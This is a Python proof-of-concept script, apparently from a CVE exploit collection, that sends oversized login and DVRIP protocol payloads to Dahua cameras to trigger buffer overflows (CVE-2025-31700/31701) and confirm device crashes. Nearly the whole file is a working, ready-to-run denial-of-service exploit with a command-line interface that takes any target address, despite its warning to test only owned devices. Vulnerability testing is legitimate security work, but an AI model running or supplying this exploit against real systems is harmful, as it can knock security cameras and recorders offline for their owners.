5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / dahua_rce.py PY
#!/usr/bin/env python3
"""
dahua_rce.py - CVE-2025-31700 / CVE-2025-31701 Buffer Overflow PoC
====================================================================

CVE-2025-31700
  CVSS  : 8.1 HIGH
  CWE   : CWE-120 (Buffer Copy Without Checking Size of Input)
  Source: https://nvd.nist.gov/vuln/detail/CVE-2025-31700
  Vendor: https://dahuasecurity.com/aboutUs/trustedCenter/details/775

CVE-2025-31701
  CVSS  : 8.1 HIGH
  CWE   : CWE-120
  Source: https://nvd.nist.gov/vuln/detail/CVE-2025-31701
  Vendor: same advisory as CVE-2025-31700

Technical details
-----------------
Both CVEs are stack/heap buffer overflows triggered by specially crafted
inbound packets. On devices without ASLR/stack canaries, a crash or
controlled RCE is possible. With ASLR enabled, the most likely outcome is a
DoS (service restart or device reboot).

This script:
  1. Probes the HTTP RPC2 endpoint with an oversized JSON body.
  2. Probes the Dahua binary protocol on TCP/37777 with an oversized frame.
  3. Monitors for a crash (connection reset, timeout, 5xx) which confirms
     the device is vulnerable.

WARNING - This test intentionally sends malformed data and *may crash the
target device*. Only run against devices you own or have written permission
to test.
"""

import argparse
import socket
import struct
import sys
import time

import requests

# Silence urllib3 warnings process-wide. The requests calls in this file pass
# verify=False. NOTE(review): presumably aimed at InsecureRequestWarning - confirm.
requests.packages.urllib3.disable_warnings()


# ---------------------------------------------------------------------------
# Constants
# ---------------------------------------------------------------------------

TCP_PROTOCOL_PORT = 37777    # default TCP port for the Dahua binary/DVRIP protocol
HTTP_OVERFLOW_SZ  = 8192     # bytes; far exceeds any legitimate field length
TCP_OVERFLOW_SZ   = 65535    # bytes in the raw binary frame body


# ---------------------------------------------------------------------------
# HTTP / RPC2 overflow probe  (CVE-2025-31700)
# ---------------------------------------------------------------------------

def http_overflow_probe(target, port=80, timeout=8):
    """
    POST an over-length ``global.login`` JSON body to ``/RPC2_Login`` and
    classify the outcome (CVE-2025-31700 probe).

    Args:
        target:  host name or IP address of the device.
        port:    HTTP port to connect to.
        timeout: timeout in seconds handed to ``requests.post``.

    Returns a result dict:
      { "status": <int|str>, "bytes": <int>, "crashed": <bool> }

    ``crashed`` is True for an HTTP status >= 500, for a connection error
    whose message mentions "reset" or "refused", and for a timeout.
    No exception escapes this function; any other error is reported in
    ``status`` with ``crashed`` set to False.
    """
    def outcome(status, crashed, size=0):
        # Single place that fixes the shape of the result dict.
        return {"status": status, "bytes": size, "crashed": crashed}

    filler = "A" * HTTP_OVERFLOW_SZ

    # The three oversized fields come first so the key order of the
    # serialized JSON stays userName, password, clientType, ...
    login_params = dict.fromkeys(("userName", "password", "clientType"), filler)
    login_params["authorityType"] = "Default"
    login_params["passwordType"] = "Default"

    request_body = {"method": "global.login", "params": login_params, "id": 1}

    try:
        url = f"http://{target}:{port}/RPC2_Login"
        response = requests.post(url, json=request_body, timeout=timeout, verify=False)
        code = response.status_code
        return outcome(code, code >= 500, len(response.content))

    except requests.exceptions.ConnectionError as exc:
        message = str(exc).lower()
        if any(marker in message for marker in ("reset", "refused")):
            return outcome("CONNECTION_RESET", True)
        return outcome(f"CONN_ERROR: {exc}", False)

    except requests.exceptions.Timeout:
        return outcome("TIMEOUT", True)

    except Exception as exc:
        return outcome(str(exc), False)


# ---------------------------------------------------------------------------
# TCP binary protocol overflow probe  (CVE-2025-31701)
# ---------------------------------------------------------------------------

def build_dvrip_frame(body):
    """
    Prefix *body* with the 12-byte header this script uses for its minimal
    DVRIP / Dahua binary protocol frame and return the result as bytes.

    Header layout (big-endian):
      uint16  0xFFD1   version magic
      uint16  0x0000   session (0 = unauthenticated)
      uint16  0x0000   sequence
      uint16  0x0000   channel
      uint32  len(body)

    The body follows the header unchanged.
    """
    # ">HHHHI" = four big-endian uint16 fields followed by one uint32.
    header = struct.pack(">HHHHI", 0xFFD1, 0x0000, 0x0000, 0x0000, len(body))
    return header + body


def tcp_overflow_probe(target, tcp_port=TCP_PROTOCOL_PORT, timeout=8):
    """
    Send one oversized DVRIP frame to the device's binary-protocol port and
    classify the outcome (CVE-2025-31701 probe).

    Args:
        target:   host name or IPv4 address of the device.
        tcp_port: TCP port of the binary protocol.
        timeout:  socket timeout in seconds for connect, send and receive.

    Returns { "status": <str>, "bytes": <int>, "crashed": <bool> }

    Status values:
      PORT_CLOSED / CONNECT_TIMEOUT / <error text>  - could not connect
                                                      (crashed = False)
      RESPONDED           - recv() returned (crashed = False)
      TIMEOUT_AFTER_SEND  - no reply within *timeout* (crashed = True)
      BROKEN_PIPE (...)   - peer dropped the connection (crashed = True)
      <error text>        - any other send/recv error (crashed = True)

    The socket is closed on every exit path, including failed connects.
    """
    def outcome(status, crashed, size=0):
        # Single place that fixes the shape of the result dict.
        return {"status": status, "bytes": size, "crashed": crashed}

    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    except Exception as exc:
        return outcome(str(exc), False)

    # The context manager closes the socket however the block is left, so a
    # refused or timed-out connect does not leak the descriptor.
    with sock:
        try:
            sock.settimeout(timeout)
            sock.connect((target, tcp_port))
        except ConnectionRefusedError:
            return outcome("PORT_CLOSED", False)
        except socket.timeout:
            return outcome("CONNECT_TIMEOUT", False)
        except Exception as exc:
            return outcome(str(exc), False)

        frame = build_dvrip_frame(b"B" * TCP_OVERFLOW_SZ)

        try:
            sock.sendall(frame)

            # Only a timeout while waiting for the reply maps to
            # TIMEOUT_AFTER_SEND; a timeout during sendall() is handled by
            # the generic handler below.
            try:
                reply = sock.recv(1024)
            except socket.timeout:
                return outcome("TIMEOUT_AFTER_SEND", True)

            # recv() returning b"" means the peer closed the connection; it
            # is still reported as RESPONDED, with bytes == 0.
            return outcome("RESPONDED", False, len(reply))

        except BrokenPipeError:
            return outcome("BROKEN_PIPE (reset by peer)", True)
        except Exception as exc:
            return outcome(str(exc), True)


# ---------------------------------------------------------------------------
# Reachability check
# ---------------------------------------------------------------------------

def check_alive(target, port=80, timeout=5):
    """
    Report whether an HTTP GET of ``http://<target>:<port>/`` completes.

    Any response counts as alive, whatever its status code. Any exception
    raised by the request yields False.
    """
    try:
        root_url = f"http://{target}:{port}/"
        requests.get(root_url, timeout=timeout, verify=False)
    except Exception:
        return False
    else:
        return True


# ---------------------------------------------------------------------------
# Main exploit flow
# ---------------------------------------------------------------------------

def run(target, port=80, tcp_port=TCP_PROTOCOL_PORT, timeout=8, cve="both"):
    """
    Drive the complete check against one device and print a verdict.

    Steps:
      1. Print a banner and confirm the device answers HTTP; exit with
         status 1 if it does not.
      2. Run the HTTP and/or TCP probe, depending on *cve*.
      3. Wait 3 seconds, check HTTP reachability again and print the result.

    Args:
        target:   host name or IP address of the device.
        port:     HTTP port used for the reachability checks and HTTP probe.
        tcp_port: port used for the binary-protocol probe.
        timeout:  timeout in seconds passed to every network call.
        cve:      "both", "http", "tcp", "2025-31700" or "2025-31701".

    Returns None; all output goes to stdout.
    """
    http_modes = ("http", "both", "2025-31700")
    tcp_modes = ("tcp", "both", "2025-31701")
    rule = "=" * 51

    def yes_no(flag):
        return "YES" if flag else "NO"

    def show(result):
        # Labels are left-padded to 8 columns so the colons line up.
        for label in ("status", "bytes", "crashed"):
            print(f"    {label:<8}: {result[label]}")

    banner = f"""
=================================================
  Dahua Buffer Overflow  CVE-2025-31700/31701
  WARNING: may crash the target device (DoS)
=================================================
Target   : {target}
HTTP     : :{port}
TCP/DVRIP: :{tcp_port}
Mode     : {cve}
"""
    print(banner)

    alive_before = check_alive(target, port, timeout)
    print(f"[*] Device reachable before probe: {yes_no(alive_before)}")
    if not alive_before:
        print("[-] Device not responding  aborting")
        sys.exit(1)

    # Placeholder results for probes that are not selected.
    skipped = {"status": "SKIPPED", "bytes": 0, "crashed": False}
    http_result = dict(skipped)
    tcp_result = dict(skipped)

    if cve in http_modes:
        print("\n[*] Sending HTTP RPC2 overflow (CVE-2025-31700) ...")
        http_result = http_overflow_probe(target, port, timeout)
        show(http_result)

    if cve in tcp_modes:
        print("\n[*] Sending TCP/DVRIP overflow (CVE-2025-31701) ...")
        tcp_result = tcp_overflow_probe(target, tcp_port, timeout)
        show(tcp_result)

    # Pause before the second reachability check.
    time.sleep(3)
    alive_after = check_alive(target, port, timeout)
    print(f"\n[*] Device reachable after probe : {yes_no(alive_after)}")

    print("\n" + rule)
    print("RESULT")
    print(rule)

    crash_seen = http_result["crashed"] or tcp_result["crashed"]

    if not alive_after:
        print("  [!!!] Device OFFLINE after payload  DoS confirmed")
        print("  Likely VULNERABLE to CVE-2025-31700 / CVE-2025-31701")
        return

    if not crash_seen:
        print("  [-] No crash observed  possibly patched or different firmware")
        print("  Note: absence of crash does not guarantee patch; test on all ports")
        return

    # Device is reachable again, but a probe reported a crash indicator.
    print("  [!!!] Crash indicators observed during probe")
    print("  Likely VULNERABLE (verify by checking device logs/reboot)")
    print("\n  [+] Device recovered  ASLR or watchdog may have restarted the service")
    print("  [+] Consistent with a real overflow contained by ASLR")


def main():
    """Parse the command line and pass the options to run()."""
    usage_examples = """
Examples:
  python dahua_rce.py 192.168.1.100
  python dahua_rce.py 192.168.1.100 -p 8080 --tcp-port 37777
  python dahua_rce.py 192.168.1.100 --cve http
  python dahua_rce.py 192.168.1.100 --cve tcp
        """

    cli = argparse.ArgumentParser(
        description="Dahua CVE-2025-31700/01 Buffer Overflow DoS PoC",
        # Raw formatter keeps the line breaks of the examples block.
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog=usage_examples,
    )

    cli.add_argument("target", help="Camera IP or hostname")
    cli.add_argument(
        "-p", "--port",
        type=int,
        default=80,
        help="HTTP port (default: 80)",
    )
    cli.add_argument(
        "--tcp-port",
        type=int,
        default=TCP_PROTOCOL_PORT,
        help=f"Dahua binary protocol port (default: {TCP_PROTOCOL_PORT})",
    )
    cli.add_argument(
        "--cve",
        choices=["both", "http", "tcp", "2025-31700", "2025-31701"],
        default="both",
        help="Which overflow to test (default: both)",
    )
    cli.add_argument("--timeout", type=int, default=8)

    opts = cli.parse_args()
    run(
        target=opts.target,
        port=opts.port,
        tcp_port=opts.tcp_port,
        timeout=opts.timeout,
        cve=opts.cve,
    )


# Run the command-line interface only when the file is executed as a script,
# not when it is imported as a module.
if __name__ == "__main__":
    main()